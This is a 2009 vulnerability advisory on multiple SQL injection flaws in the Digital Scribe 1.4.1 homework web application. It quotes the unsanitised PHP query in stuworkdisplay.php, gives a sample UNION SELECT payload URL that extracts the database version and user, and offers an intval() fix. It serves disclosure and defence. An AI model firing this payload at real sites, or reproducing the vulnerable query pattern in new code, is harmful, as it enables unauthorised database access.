81 lines
No EOL
1.8 KiB
Text
81 lines
No EOL
1.8 KiB
Text
Digital Scribe 1.4.1 Multiple SQL Injection Vulnerabilities
|
|
|
|
Name Digital Scribe
|
|
Vendor http://www.digital-scribe.org
|
|
Versions Affected 1.4.1
|
|
|
|
Author Salvatore Fresta aka Drosophila
|
|
Website http://www.salvatorefresta.net
|
|
Contact salvatorefresta [at] gmail [dot] com
|
|
Date 2009-12-11
|
|
|
|
X. INDEX
|
|
|
|
I. ABOUT THE APPLICATION
|
|
II. DESCRIPTION
|
|
III. ANALYSIS
|
|
IV. SAMPLE CODE
|
|
V. FIX
|
|
VI. DISCLOSURE TIMELINE
|
|
|
|
|
|
I. ABOUT THE APPLICATION
|
|
|
|
The Digital Scribe is a free, intuitive system designed to
|
|
help teachers put student work and homework assignments
|
|
online.
|
|
|
|
|
|
II. DESCRIPTION
|
|
|
|
This application is affected by many SQL Injection
|
|
security flaws. In order to exploit they, the Magic Quotes
|
|
GPG (php.ini) must be Off except one.
|
|
I tested 1.4.1 version only, however other versions may be
|
|
also vulnerable.
|
|
|
|
|
|
III. ANALYSIS
|
|
|
|
Summary:
|
|
|
|
A) Multiple SQL Injection
|
|
|
|
A) Multiple SQL Injection
|
|
|
|
Multiple SQL Injection issues has been found in Digital
|
|
Scribe version 1.4.1 and no authentication is required
|
|
in order to exploit these vulnerabilities.
|
|
The most issues required the Magic Quotes GPG setted to
|
|
off except one (stuworkdisplay.php).
|
|
For semplicity I reported only this last one vulnerable
|
|
code.
|
|
|
|
Vulnerable code:
|
|
|
|
........
|
|
|
|
$show = mysql_query("SELECT * FROM ".$conf['tbl']['projecttable']."
|
|
WHERE(ID=$HTTP_GET_VARS[ID])");
|
|
|
|
........
|
|
|
|
|
|
IV. SAMPLE CODE
|
|
|
|
http://site/path/stuworkdisplay.php?ID=-1) UNION ALL SELECT
|
|
version(),user(),3,4,5,6,7,8,9,10,11%23
|
|
|
|
|
|
V. FIX
|
|
|
|
$id = intval($_GET['ID']);
|
|
$show = mysql_query("SELECT * FROM ".$conf['tbl']['projecttable']."
|
|
WHERE(ID=$id)");
|
|
|
|
|
|
VIII. DISCLOSURE TIMELINE
|
|
|
|
2009-12-11 Bug discovered
|
|
2009-12-11 Initial vendor contact
|
|
2009-12-11 Advisory Release |